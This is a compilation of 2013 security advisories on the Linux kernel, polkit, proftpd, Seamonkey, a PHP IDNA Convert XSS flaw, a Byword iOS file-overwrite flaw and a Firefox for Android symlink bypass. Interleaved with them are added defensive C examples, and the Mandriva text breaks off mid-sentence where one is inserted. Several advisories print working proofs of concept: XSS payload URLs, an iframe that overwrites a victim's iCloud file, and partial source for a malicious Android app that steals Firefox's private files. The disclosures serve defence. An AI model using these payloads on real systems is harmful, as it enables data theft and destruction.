[SECURITY] [DSA 2766-1] linux-2.6 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2766-1                   secur...@debian.org
http://www.debian.org/security/                             Dann Frazier
September 27, 2013                     http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : linux-2.6
Vulnerability  : privilege escalation/denial of service/information leak
Problem type   : local/remote
Debian-specific: no
CVE Id(s)      : CVE-2013-2141 CVE-2013-2164 CVE-2013-2206 CVE-2013-2232
                 CVE-2013-2234 CVE-2013-2237 CVE-2013-2239 CVE-2013-2851
                 CVE-2013-2852 CVE-2013-2888 CVE-2013-2892

Several vulnerabilities have been discovered in the Linux kernel that may lead
to a denial of service, information leak or privilege escalation. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2013-2141

    Emese Revfy provided a fix for an information leak in the tkill and tgkill
    system calls. A local user on a 64-bit system may be able to gain access
    to sensitive memory contents.

CVE-2013-2164

    Jonathan Salwan reported an information leak in the CD-ROM driver. A local
    user on a system with a malfunctioning CD-ROM drive could gain access to
    sensitive memory.

CVE-2013-2206

    Karl Heiss reported an issue in the Linux SCTP implementation. A remote
    user could cause a denial of service (system crash).

CVE-2013-2232

    Dave Jones and Hannes Frederic Sowa resolved an issue in the IPv6
    subsystem. Local users could cause a denial of service by using an
    AF_INET6 socket to connect to an IPv4 destination.

CVE-2013-2234

    Mathias Krause reported a memory leak in the implementation of PF_KEYv2
    sockets. Local users could gain access to sensitive kernel memory.

CVE-2013-2237

    Nicolas Dichtel reported a memory leak in the implementation of PF_KEYv2
    sockets. Local users could gain access to sensitive kernel memory.

CVE-2013-2239

    Jonathan Salwan discovered multiple memory leaks in the openvz kernel
    flavor. Local users could gain access to sensitive kernel memory.

CVE-2013-2851

    Kees Cook reported an issue in the block subsystem. Local users with uid 0
    could gain elevated ring 0 privileges. This is only a security issue for
    certain specially configured systems.

CVE-2013-2852

    Kees Cook reported an issue in the b43 network driver for certain Broadcom
    wireless devices. Local users with uid 0 could gain elevated ring 0
    privileges. This is only a security issue for certain specially configured
    systems.

CVE-2013-2888

    Kees Cook reported an issue in the HID driver subsystem. A local user, with
    the ability to attach a device, could cause a denial of service (system
    crash).

CVE-2013-2892

    Kees Cook reported an issue in the pantherlord HID device driver. Local
    users with the ability to attach a device could cause a denial of service
    or possibly gain elevated privileges.

For the oldstable distribution (squeeze), this problem has been fixed in
version 2.6.32-48squeeze4.

The following matrix lists additional source packages that were rebuilt for
compatibility with or to take advantage of this update:

                          Debian 6.0 (squeeze)
user-mode-linux           2.6.32-1um-4+48squeeze4

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

Note: Debian carefully tracks all known security issues across every linux
kernel package in all releases under active security support. However, given
the high frequency at which low-severity security issues are discovered in the
kernel and the resource requirements of doing an update, updates for lower
priority issues will normally not be released for all kernels at the same
time. Rather, they will be released in a staggered or leap-frog fashion.

Further information about Debian Security Advisories, how to apply these
updates to your system and frequently asked questions can be found at:
http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)

iQIcBAEBAgAGBQJSRhLtAAoJEBv4PF5U/IZA18oP/jpZRZu3XXN7t4GOLeH94vgg
OyKwG+EyltAjYAq4XfCjUens5SfH8BylfXITpEkq2d2AWVI/K2fsuStpDbeHLtPo
p1+x3s1xQynxQLPrnqZlOqs58iHEnKF/A9NyJHu/rAO1iA24B8hcNGPTWEL6007Z
MWqJ0avaTXtgvOk/jRumR3qVlW0fskK5uS9lIVRX/S2WWQ2LPLwJ9URLV6YGeoi5
gyMGCMgkqiMQsGt4CTCoLjk26R/W70ed138088sZOMqHxaMlAImDClOMpnD9i/2g
XQ9mP0htmcyCdDB6I2H4QCQ6+YzAi424EL2j5b4ZX4NMjHs0sUYNfYWY/mRyg2kB
o6GI+ZRXl7N02nZw6ugFU/HTk7J2IVFbtYUf7KclJR74QkcKTSFxTOKZQp4ElZU2
gvdL4764JK8IfW0dk+jK7uzENWfu+U1JT8t+Ta8iuLKf+dx7BDT8uX9ebfSELJxo
5RX1OdmUcgIJsRxngPkr79QGIV13s1G/Af3dFqDGjCeOqlKS96OuatpkA45hwjEr
LSKoVRX63zePo8Ru7NH6OLNI37RGCxHOwGO5Xu0lOR7NAizQ2afvcDnKfAh7DV9D
[ MDVSA-2013:243 ] polkit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:243
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : polkit
 Date    : September 27, 2013
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated polkit packages fix security vulnerability:

 A race condition was found in the way the PolicyKit pkcheck utility
 checked process authorization when the process was specified by its
 process ID via the --process option. A local user could use this flaw
 to bypass intended PolicyKit authorizations and escalate their
 privileges (CVE-2013-4288).

 Note: Applications that invoke pkcheck with the --process option need
 to be modified to use the pid,pid-start-time,uid argument for that
 option, to allow pkcheck to check process authorization correctly.

 Because of the change in the PolicyKit API, hplip (CVE-2013-4325),
 rtkit (CVE-2013-4326), and systemd (CVE-2013-4327) packages have been
 updated to use a different API that is not affected by this PolicyKit
 vulnerability.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4288
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4325
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4326
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4327
 https://bugs.mageia.org/show_bug.cgi?id=11260
 _______________________________________________________________________

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 a505f84a730fe73329a47e34c63a7dbe  mbs1/x86_64/hplip-3.12.4-1.1.mbs1.x86_64.rpm
 3a4ba0c6f598df5d0a895e92d86bdee6  mbs1/x86_64/hplip-doc-3.12.4-1.1.mbs1.x86_64.rpm
 5ff79b31c0d10f328cb3a33e73ee443f  mbs1/x86_64/hplip-hpijs-3.12.4-1.1.mbs1.x86_64.rpm
 06ad03c60671fdc268f68c19abccdead  mbs1/x86_64/hplip-hpijs-ppds-3.12.4-1.1.mbs1.x86_64.rpm
 464c910aa533f8a8bb2f2c3022127339  mbs1/x86_64/hplip-model-data-3.12.4-1.1.mbs1.x86_64.rpm
 c868787d3990ecfdae81124e449b9fe5  mbs1/x86_64/lib64hpip0-3.12.4-1.1.mbs1.x86_64.rpm
 16b802096b39e33c3c2e048e5034f6ee  mbs1/x86_64/lib64hpip0-devel-3.12.4-1.1.mbs1.x86_64.rpm
 d9832f1d43a46d48de126d112744a63f  mbs1/x86_64/lib64polkit1_0-0.104-6.1.mbs1.x86_64.rpm
 7cb376fc2241b8ef5d9fec5d56f8b44e  mbs1/x86_64/lib64polkit1-devel-0.104-6.1.mbs1.x86_64.rpm
 6bd18537f831797178c8d8797ddb38c8  mbs1/x86_64/lib64polkit-gir1.0-0.104-6.1.mbs1.x86_64.rpm
 bf1d4dfcde5c3268d93d3410686390cf  mbs1/x86_64/lib64sane-hpaio1-3.12.4-1.1.mbs1.x86_64.rpm
 03c53c95ae85aa80d715eba6cb0a568e  mbs1/x86_64/lib64systemd-daemon0-44-16.1.mbs1.x86_64.rpm
 3d652b24d8237db4354232c58da626f7  mbs1/x86_64/lib64systemd-daemon0-devel-44-16.1.mbs1.x86_64.rpm
 720ca216bd163136e6157fae2ce3a8ce  mbs1/x86_64/lib64systemd-id1280-44-16.1.mbs1.x86_64.rpm
 3dec561fc60e5670f775759d279b73f9  mbs1/x86_64/lib64systemd-id1280-devel-44-16.1.mbs1.x86_64.rpm
 a5f09de0fe35f59d4f03c44d60706fc8  mbs1/x86_64/lib64systemd-journal0-44-16.1.mbs1.x86_64.rpm
 1aa5d342f5e1ea17ad23a3adcb846b67  mbs1/x86_64/lib64systemd-journal0-devel-44-16.1.mbs1.x86_64.rpm
 989d00585eda3757067bd7757760d21f  mbs1/x86_64/lib64systemd-login0-44-16.1.mbs1.x86_64.rpm
 a64fbbeaf21c77c50bda1fff4278a34c  mbs1/x86_64/lib64systemd-login0-devel-44-16.1.mbs1.x86_64.rpm
 03ba458caeb642419984d0984ea156b9  mbs1/x86_64/polkit-0.104-6.1.mbs1.x86_64.rpm
 f58526b0a6b7dd710d6ae50c401f3ca1  mbs1/x86_64/polkit-desktop-policy-0.104-6.1.mbs1.noarch.rpm
 535391c9d869772e68cd13adac519113  mbs1/x86_64/rtkit-0.10-3.1.mbs1.x86_64.rpm
 867308654e786d01f4c66054cca07ab5  mbs1/x86_64/systemd-44-16.1.mbs1.x86_64.rpm
 52e155e8f9d39745da50bd8bcea8cd54  mbs1/x86_64/systemd-sysvinit-44-16.1.mbs1.x86_64.rpm
 f71f9b8a5f1676bc3af636e510f9c7a8  mbs1/x86_64/systemd-tools-44-16.1.mbs1.x86_64.rpm
 959a6d57120d110fc44178581105eb55  mbs1/x86_64/systemd-units-44-16.1.mbs1.x86_64.rpm
 119ee4665dda5c72402c2fdf7d6c5298  mbs1/SRPMS/hplip-3.12.4-1.1.mbs1.src.rpm
 f78ac8cf2fc3c60849ae806c1de0c4dd  mbs1/SRPMS/polkit-0.104-6.1.mbs1.src.rpm
 0af0c0abd85fc991c6592365cc93dd6e  mbs1/SRPMS/rtkit-0.10-3.1.mbs1.src.rpm
 3ac52aac654aaf3f3fefde1207e827e4  mbs1/SRPMS/systemd-44-16.1.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report
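The note above tells callers of pkcheck to pass "pid,pid-start-time,uid" instead of a bare pid, so that a process which exits and has its pid reused cannot be confused with the one that was authorized. The following is an added example, not Mandriva's or polkit's own code, of how a privileged helper written in C would build that triple on Linux: the start time is field 22 of /proc/<pid>/stat, and because the comm field (field 2) may itself contain spaces and parentheses, the parser counts fields from the last ')' rather than from the start of the line. The stat line below is a constructed sample, and the action id in the comment is a placeholder.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* Constructed sample of /proc/1234/stat. The comm field deliberately contains
 * a space and a nested parenthesis; the start time (field 22) is 987654. */
const char *const SAMPLE_STAT =
    "1234 (fax (daemon)) S 1 1234 1234 0 -1 4194560 100 0 0 0 5 2 0 0 "
    "20 0 1 0 987654 12345678 300 18446744073709551615 1 1 0 0 0 0 0 0 0 "
    "0 0 0 0 17 0 0 0 0 0 0\n";

/* Extracts field 22 (starttime, in clock ticks since boot) from the text of
 * a /proc/<pid>/stat file. Returns 0 on success, -1 if the text is malformed. */
int stat_start_time(const char *stat, unsigned long long *start) {
    const char *p = strrchr(stat, ')');      /* end of the comm field */
    if (!p) return -1;
    p++;
    /* Fields 3..21 are the next 19 tokens; skip them to reach field 22. */
    for (int field = 3; field < 22; field++) {
        while (*p == ' ') p++;
        if (*p == '\0' || *p == '\n') return -1;
        while (*p && *p != ' ') p++;
    }
    while (*p == ' ') p++;
    char *end;
    *start = strtoull(p, &end, 10);
    return end == p ? -1 : 0;
}

/* Formats "pid,start-time,uid" into out (capacity outsz) from stat text.
 * Returns 0 on success, -1 on parse error or if out is too small. */
int pkcheck_process_arg(pid_t pid, const char *stat, uid_t uid,
                        char *out, size_t outsz) {
    unsigned long long start;
    if (stat_start_time(stat, &start) != 0) return -1;
    int n = snprintf(out, outsz, "%ld,%llu,%lu",
                     (long)pid, start, (unsigned long)uid);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Same, reading the live /proc entry (Linux only). */
int pkcheck_process_arg_live(pid_t pid, uid_t uid, char *out, size_t outsz) {
    char path[64], buf[1024];
    snprintf(path, sizeof path, "/proc/%ld/stat", (long)pid);
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t got = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[got] = '\0';
    return pkcheck_process_arg(pid, buf, uid, out, outsz);
}

/* Runs the parser over the constructed sample and compares the result. */
int sample_arg_equals(const char *expected) {
    char arg[64];
    if (pkcheck_process_arg(1234, SAMPLE_STAT, 1000, arg, sizeof arg) != 0)
        return 0;
    return strcmp(arg, expected) == 0;
}

/* 1 if a stat line without a comm field is rejected instead of misparsed. */
int malformed_stat_rejected(void) {
    unsigned long long v = 0;
    return stat_start_time("1234 no-parentheses-here S 1 2 3\n", &v) == -1;
}

int main(void) {
    char arg[64];
    if (pkcheck_process_arg(1234, SAMPLE_STAT, 1000, arg, sizeof arg) != 0)
        return 1;
    /* A caller would then invoke, with its own action id in place of the
     * placeholder:
     *   pkcheck --action-id org.example.placeholder --process "1234,987654,1000"
     * rather than the racy `--process 1234`. */
    printf("--process %s\n", arg);
    return 0;
}
```

The live variant reads /proc on the machine it runs on, so only the pure parser is exercised by the sample; the point of the triple is that the start time is fixed for the lifetime of a process, so a later process that happens to reuse the pid will not match.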
[IBliss Security Advisory] Cross-site scripting ( XSS ) in PHP IDNA Convert
[ PHP IDNA Convert Cross-site scripting ( XSS ) ]

[ Vendor product description ]

PHP Net_IDNA is a class to convert between the Punycode and Unicode formats. Punycode is a standard described in RFC 3492 and part of IDNA (Internationalizing Domain Names in Applications [RFC3490]). This class allows PHP scripts to convert these domain names without having one of the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008.

[ Bug Description ]

Cross-site scripting (XSS) vulnerability in the encoded/decoded parameters of the class PHP IDNA Convert allows remote attackers to inject arbitrary web script or HTML.

[ History ]

Advisory sent to vendor on 09/24/2013
Vendor reply on 09/25/2013
Vulnerability fixed on 09/26/2013

[ Impact ]

HIGH

[ Affected Version ]

0.8.0

[ Vendor Reply ]

Yes. Version 0.8.1 released

[ CVE Reference ]

[ PoC ]

Payloads:

http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22&encode=Encode%20&idn_version=2003

http://[host]/idna_convert/example.php?decode=%20Decode&encoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22

http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E

[ References ]

[1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html
[2] OWASP Cross-site scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/

iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos
alexos (at) ibliss.com (dot) br [email concealed]
Linux Kernel Patches For Linux Kernel Security
Hi forks! I release an article for linux kernel security. - http://www.x90c.org/articles/linux_kernel_patches.txt x90c
[slackware-security] seamonkey (SSA:2013-271-01)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  seamonkey (SSA:2013-271-01)

New seamonkey packages are available for Slackware 14.0 and -current to
fix security issues.


Here are the details from the Slackware 14.0 ChangeLog:
+--------------------------+
patches/packages/seamonkey-2.21-i486-1_slack14.0.txz:  Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    http://www.mozilla.org/security/known-vulnerabilities/seamonkey.html
  (* Security fix *)
patches/packages/seamonkey-solibs-2.21-i486-1_slack14.0.txz:  Upgraded.
+--------------------------+


Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated packages for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-2.21-i486-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-solibs-2.21-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-2.21-x86_64-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-solibs-2.21-x86_64-1_slack14.0.txz

Updated packages for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/seamonkey-solibs-2.21-i486-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.21-i486-1.txz

Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/seamonkey-solibs-2.21-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.21-x86_64-1.txz


MD5 signatures:
+-------------+

Slackware 14.0 packages:
ddb9d5b02abd2959e86dda85f3c99427  seamonkey-2.21-i486-1_slack14.0.txz
e5bfdbe2609579ad29c8ef265557cc82  seamonkey-solibs-2.21-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages:
5bc6509907f5fac6294e00f6f3b8095f  seamonkey-2.21-x86_64-1_slack14.0.txz
46a11a3c8882227d9273ffb249532c11  seamonkey-solibs-2.21-x86_64-1_slack14.0.txz

Slackware -current packages:
d69931416f3e6b9c03839f67b825cc6a  l/seamonkey-solibs-2.21-i486-1.txz
0e77abc3c7bfa8e8eaeef9f084cdac8f  xap/seamonkey-2.21-i486-1.txz

Slackware x86_64 -current packages:
f59f929929100b76a654638f76da8e10  l/seamonkey-solibs-2.21-x86_64-1.txz
d0d5ce856e86b283154e64c279558a1b  xap/seamonkey-2.21-x86_64-1.txz


Installation instructions:
+-------------------------+

Upgrade the packages as root:
# upgradepkg seamonkey-2.21-i486-1_slack14.0.txz seamonkey-solibs-2.21-i486-1_slack14.0.txz


+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majord...@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlJHk1QACgkQakRjwEAQIjMALwCdEODgAGSbbA1ahL1cL/rs7lWo
6CUAn3l6MgVkdLgO78Idp1wOQM+IINFK
=OXUp
-----END PGP SIGNATURE-----
[SECURITY] [DSA 2767-1] proftpd-dfsg security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2767-1                   secur...@debian.org
http://www.debian.org/security/                               Nico Golde
September 29, 2013                     http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : proftpd-dfsg
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-4359
Debian Bug     : 723179

Kingcope discovered that the mod_sftp and mod_sftp_pam modules of proftpd, a
powerful modular FTP/SFTP/FTPS server, do not properly validate input before
making pool allocations. An attacker can use this flaw to conduct denial of
service attacks against the system running proftpd (resource exhaustion).

For the oldstable distribution (squeeze), this problem has been fixed in
version 1.3.3a-6squeeze7.

For the stable distribution (wheezy), this problem has been fixed in
version 1.3.4a-5+deb7u1.

For the testing (jessie) and unstable (sid) distributions, this problem will
be fixed soon.

We recommend that you upgrade your proftpd-dfsg packages.

Further information about Debian Security Advisories, how to apply these
updates to your system and frequently asked questions can be found at:
http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)

iQIcBAEBCgAGBQJSSETZAAoJEM1LKvOgoKqqLY0QAL6FDDkvW6Xgnenra8vic2OR
YCU0rSzN8eXcbuO3X1vUecUj7dcY8hrFcA0EgNTOK1x7GZHUXfFg5KpVj7/KBawL
V4d0glQEqBrsi+6b/MxNlHP7dvKLMVuRSVdf8tfRjsDBXNOVW303se4b9fyTNx3i
xAKkbfhDioM3uRfK+j49GhcxosuUE3blAKAB3oAX2BEMTbiGTbgniXfPiZEf2Vfe
1Hq4myEWK/Cd51Cw21+fZPC6sj3Xg5ffYUSZ7UakxednLvbHMnFIG1t9MLXEiAEx
/VFxjnExnztZTAx2cgBbqO+y5JXprHg1V5Q/B2EWzYcSJ/gSGXYnf33JUnaSMsik
rPv+/ubC+c0MuYtoi1z+lIzNyOTRr0IJn11C4/E8HRJi98fhWuLhxq8Qgtrh9HiM
E5sWvxQAEBp2BYI/3Rxn2gz4BuVzl/TLXdegGeS9CpxxqHYuoulFp43RtYhUTDmQ
34Y2x074Mx6zbabK4OociuXLdx2t8WAaU2x/D2tI97fc8RCRy7CJFIISKmPPL7Jx
xts13MYynwPIkrGihFSu2dYSmAz+Mqorczjbu1ZkBCFuOzPl1W/ibPe3VuhaVydK
t8i4Ak71UaQxSzClAXmZw/wUvsPZCEJrgS+Jwb9WFM+AzBUoLkdQMusNqhUD3X07
Cc6BpuMQzU+pMhDg6Xwl
=2l5u
-----END PGP SIGNATURE-----
[CVE-2013-5725] - Byword for iOS Data Destruction Vulnerability
- Affected Vendor: http://metaclassy.com/
- Affected Software: Byword for iOS
- Affected Version: 2.x prior to 2.1
- Issue Type: Lack of validation/user confirmation leading to destruction of data
- Release Date: 29 Sept 2013
- Discovered by: Guillaume Ross
- CVE Identifier: CVE-2013-5725
- Issue Status: Vendor has published version 2.1 which adds a confirmation prompt to prevent the issue.

**Summary**

Byword is a text editor for iOS and OS X that can use iCloud or Dropbox to sync documents. Byword supports actions through X-URLs on iOS. One of the supported actions replaces a file with the value passed through the URL.

**Description**

The Replace file action in the affected version does not warn the user and replaces the content of the target file with the text specified in the X-URL. The attacker must know the path to the file, but since iCloud does not have subfolders, filenames such as todo.txt or important.txt are easier to guess; alternatively, the attacker could have received a file created by the victim using Byword and can guess the filename from the title.

**Impact**

The file can be overwritten and the data could be lost permanently.

**Proof of Concept**

byword://replace?location=icloud&path=&name=Important.txt&text=haha

This URL would replace the content of the file Important.txt in the user's iCloud container for Byword with "haha".

By using iframes, the attacker can embed this attack in a web page. Safari on iOS will automatically launch Byword and overwrite the file.

<iframe src="byword://replace?location=icloud&path=&name=Important.txt&text=haha"></iframe>

**Response Timeline**

- August 26 2013 - Vendor notified
- August 26 2013 - Vendor acknowledges vulnerability
- September 18 2013 - Update released that adds a warning/confirmation screen
- September 29 2013 - Advisory released
Firefox for Android - Same-origin bypass through symbolic links
CVE Number: CVE-2013-1727
Vendor Identifier: MFSA 2013-84
Title: Firefox for Android - Same-origin bypass through symbolic links
Affected Software: Prior to v24 (confirmed on v14)
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v24 was released which fixes this vulnerability

Overview:

Firefox for Android's Same-Origin Policy for local files (file: URI) can be bypassed by using symbolic links. It results in theft of Firefox's private files by malicious Android apps.

Details:

As described in the MDN document (*), Firefox allows a local file to read another file only if the parent directory of the originating file is an ancestor directory of the target file.

* https://developer.mozilla.org/en-US/docs/Same-origin_policy_for_file:_URIs

However, it is possible to circumvent the restriction by a trick using a symbolic link. This issue enables malicious Android apps to steal Firefox's private files such as the Cookie file.

As an example, the steps to steal Firefox's profiles.ini are described below:

1. An attacker's app creates a malicious HTML file, and makes Firefox load its URL with the file scheme. The malicious HTML contains JavaScript code which, a few seconds later, tries to read the same URL as itself via XMLHttpRequest.

    <u>Wait a few seconds.</u>
    <script>
    function doit() {
      var xhr = new XMLHttpRequest;
      xhr.onload = function() {
        alert(xhr.responseText);
      };
      xhr.open('GET', document.URL);
      xhr.send(null);
    }
    setTimeout(doit, 8000);
    </script>

2. Before the XHR fires, the attacker's app replaces the malicious HTML with a symbolic link pointing to Firefox's profiles.ini file.

3. When the XHR fires, Firefox follows the symlink and provides the content of the profiles.ini file to the malicious HTML.

Through the steps above, the attacker's app can obtain the path of Firefox's private files such as the Cookie file. The attacker's app can also get the contents of those private files in a similar manner.

Note:

It should be noted that this issue does not matter in Firefox for normal PC platforms (such as Windows OS), in which all apps are regarded as reasonably trustworthy. However, it does matter on the Android platform, whose sandbox security model is intended to segregate apps. On such platforms, app developers cannot regard other apps as trustworthy. Because of this difference in platform security model, Android apps that are ported from PC often suffer from unexpected vulnerabilities. Obviously such vulnerabilities are not specific to Firefox. In reality, I discovered such vulnerabilities in Chrome for Android last year.

Chrome for Android vulnerabilities:
1. http://seclists.org/bugtraq/2013/Jan/22
2. http://seclists.org/bugtraq/2013/Jan/23
3. http://seclists.org/bugtraq/2013/Jan/24
4. http://seclists.org/bugtraq/2013/Jan/25
5. http://seclists.org/bugtraq/2013/Jan/26
(#4 is quite a similar issue to the one described in this advisory)

Proof of Concept:

    /***********************************************************
     * malicious android app that steals Firefox's profiles.ini file
     ***********************************************************/
    package jp.mbsd.terada.attackfirefox1;

    import android.net.Uri;
    import android.os.Bundle;
    import android.app.Activity;
    import android.content.Intent;

    public class MainActivity extends Activity {
        public final static String MY_PKG = "jp.mbsd.terada.attackfirefox1";
        public final static String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/";
        public final static String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".html";
        public final static String TARGET_PKG = "org.mozilla.firefox";
        public final static String TARGET_FILE_PATH = "/data/data/" + TARGET_PKG + "/files/mozilla/profiles.ini";
        public final static String HTML =
            "<u>Wait a few seconds.</u>" +
            "<script>" +
            "function doit() {" +
            "  var xhr = new XMLHttpRequest;" +
            "  xhr.onload = function() {" +
            "    alert(xhr.responseText);" +
            "  };" +
            "  xhr.open('GET', document.URL);" +
            "  xhr.send(null);" +
            "}" +
            "setTimeout(doit, 8000);" +
            "</script>";

        @Override
        public void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_main);
            doit();
        }

        public void doit() {
            try {
                // create a malicious HTML
                cmdexec("mkdir " + MY_TMP_DIR);
                cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
                cmdexec("chmod -R 777 " + MY_TMP_DIR);
                Thread.sleep(1000);

                // force Firefox to load the malicious HTML
                invokeFirefox("file://" + HTML_PATH);
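The rule the advisory quotes (the originating file's parent directory must be an ancestor of the target) is sound; what the symlink trick defeats is a check that judges the requested path as written. The following added example, which is neither the advisory's nor Firefox's code, replays the three steps in a temporary directory and contrasts a string-only ancestor check with one that canonicalizes the target with realpath() at read time and compares it against the origin directory recorded (also canonically) at load time. The directory under /tmp, the file names page.html and profiles.ini and their contents are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <libgen.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pure string test: 1 if `dir` is `path` itself or one of its ancestors. */
static int is_ancestor(const char *dir, const char *path) {
    size_t n = strlen(dir);
    if (strcmp(dir, "/") == 0) return path[0] == '/';
    return strncmp(dir, path, n) == 0 && (path[n] == '/' || path[n] == '\0');
}

/* Load time: record the canonical directory of the originating document.
 * Returns 0 on success, -1 if the file cannot be resolved or out is too small. */
int origin_dir_at_load(const char *origin_file, char *out, size_t outsz) {
    char resolved[PATH_MAX];
    if (!realpath(origin_file, resolved)) return -1;
    const char *dir = dirname(resolved);     /* may rewrite resolved in place */
    if (strlen(dir) >= outsz) return -1;
    strcpy(out, dir);
    return 0;
}

/* Vulnerable shape: judge the requested path as written, symlinks included. */
int naive_read_allowed(const char *origin_dir, const char *target) {
    return is_ancestor(origin_dir, target);
}

/* Hardened shape: resolve symlinks at read time, then apply the same rule.
 * A target that cannot be resolved is denied rather than guessed at. */
int read_allowed(const char *origin_dir, const char *target) {
    char resolved[PATH_MAX];
    if (!realpath(target, resolved)) return 0;
    return is_ancestor(origin_dir, resolved);
}

static int write_text(const char *path, const char *text) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Replays the advisory's three steps inside a fresh temporary directory:
 * load app/page.html, swap it for a symlink to a file outside app/, then ask
 * both checks whether the page may read document.URL again.
 * Returns (naive << 1) | hardened, or -1 if the setup failed. */
int demo_symlink_swap(void) {
    char tmpl[] = "/tmp/sop-demo-XXXXXX";
    char root[PATH_MAX], app[PATH_MAX], page[PATH_MAX], secret[PATH_MAX];
    char origin_dir[PATH_MAX];
    if (!mkdtemp(tmpl) || !realpath(tmpl, root)) return -1;
    snprintf(app, sizeof app, "%s/app", root);
    snprintf(page, sizeof page, "%s/app/page.html", root);
    snprintf(secret, sizeof secret, "%s/profiles.ini", root);  /* outside app/ */
    if (mkdir(app, 0700) != 0 || write_text(page, "<html></html>\n") != 0 ||
        write_text(secret, "[Profile0]\nPath=constructed\n") != 0) return -1;
    /* Step 1: the document is loaded; its origin directory is fixed here. */
    if (origin_dir_at_load(page, origin_dir, sizeof origin_dir) != 0) return -1;
    /* Step 2: the file is replaced by a symlink that points outside app/. */
    if (unlink(page) != 0 || symlink(secret, page) != 0) return -1;
    /* Step 3: the script asks to read the same URL. */
    int naive = naive_read_allowed(origin_dir, page);
    int hardened = read_allowed(origin_dir, page);
    unlink(page); unlink(secret); rmdir(app); rmdir(root);        /* tidy up */
    return (naive << 1) | hardened;
}

int main(void) {
    int r = demo_symlink_swap();
    if (r < 0) { perror("demo setup"); return 1; }
    printf("naive check: %s, symlink-aware check: %s\n",
           (r & 2) ? "allowed" : "denied", (r & 1) ? "allowed" : "denied");
    return r == 2 ? 0 : 1;
}
```

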